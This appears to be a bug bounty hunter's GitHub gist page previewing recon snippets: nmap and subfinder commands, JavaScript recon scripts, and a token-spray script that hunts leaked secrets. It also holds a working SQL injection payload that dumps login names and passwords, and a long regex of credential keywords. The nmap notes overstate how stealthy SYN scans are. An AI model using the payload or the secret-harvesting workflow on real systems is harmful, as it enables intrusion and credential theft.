Md Saikat 0xh7ml
scan target for pentest
nmap -Pn -n -A -sS -p- -oN output.nmap <IP>
-Pn : no ping check (assume the host is up)
-n : no DNS resolution
-A : detect system info
-sT : TCP connect [leaves traces in the server logs] (-sS SYN is less intrusive and, by default, leaves no trace in the logs)
-p- : ports 0-65535
-oN output.nmap : write output to file
add a UDP scan in parallel with -sU (DNS, IPsec ...)
@0xh7ml
0xh7ml / GoldDigger
Created September 15, 2020 12:00 — forked from j3rrykh4n/GoldDigger
Look for holes and dig everything ~_~
Technology
Subdomain Enumeration:
# Basic usage
subfinder -d example.com > example.com.subs
# Recursive
subfinder -d example.com -recursive -silent -t 200 -v -o example.com.subs

Keybase proof

I hereby claim:

  • I am 0xh7ml on github.
  • I am 0xsasuke (https://keybase.io/0xsasuke) on keybase.
  • I have a public key ASCn_XJwTD3ILHr_j5XvOWzpyj4Wmt2LLtn2FkfmhdxElAo

To claim this, I am signing this object:

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin

def js(domain):
    # Fetch the page with a browser-like User-Agent and parse the HTML
    session = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
    html = session.get(domain).content
    soup = bs(html, "html.parser")
    # The rest of this gist is not shown in the preview; return the parsed document
    return soup
@0xh7ml
0xh7ml / all.txt
Created September 18, 2021 18:07 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
@0xh7ml
0xh7ml / JavascriptRecon.md
Created November 4, 2021 18:43
My Javascript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty hunting.

Steps

  • The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulns)
@0xh7ml
0xh7ml / token_spray_automation.sh
Created November 11, 2021 06:12 — forked from aufzayed/token_spray_automation.sh
search for leaked data (tokens, secrets) in JavaScript files and validate them with nuclei token spray
# requirements:
# gf -> https://github.com/tomnomnom/gf
# gf patterns to find leaked tokens and secrets -> https://github.com/emadshanab/Gf-Patterns-Collection
# subjs -> https://github.com/lc/subjs
# gau -> https://github.com/lc/gau
# nuclei -> https://github.com/projectdiscovery/nuclei
# hakcheckurl -> https://github.com/hakluke/hakcheckurl
# note: before you run the script, edit your gf patterns, remove all grep 'H' and 'n' flags, and add the 'h' flag
@0xh7ml
0xh7ml / wordlist_from_js.sh
Created November 23, 2021 10:08 — forked from seqrity/wordlist_from_js.sh
Make wordlist from js files
#! /bin/bash
## This script fetches JS files from a domain name and builds a wordlist from the words found in those JS files
## Credit: https://gist.github.com/aufzayed/6cabed910c081cc2f2186cd27b80f687
##### Install requirements #####
##### Before running this script you should install Go #####
## Install subjs (https://github.com/lc/subjs)
go install github.com/lc/subjs@latest   # 'go get -u' for installing binaries is no longer supported in module mode (Go 1.17+)
@0xh7ml
0xh7ml / sqli.txt
Last active April 29, 2025 08:10
Dios for dumping data
(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(login)WHERE(@x)IN(@x:=CONCAT(0x20,@x,id,0x3a3a,name,0x3a3a,pass,0x3c62723e))))x)
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k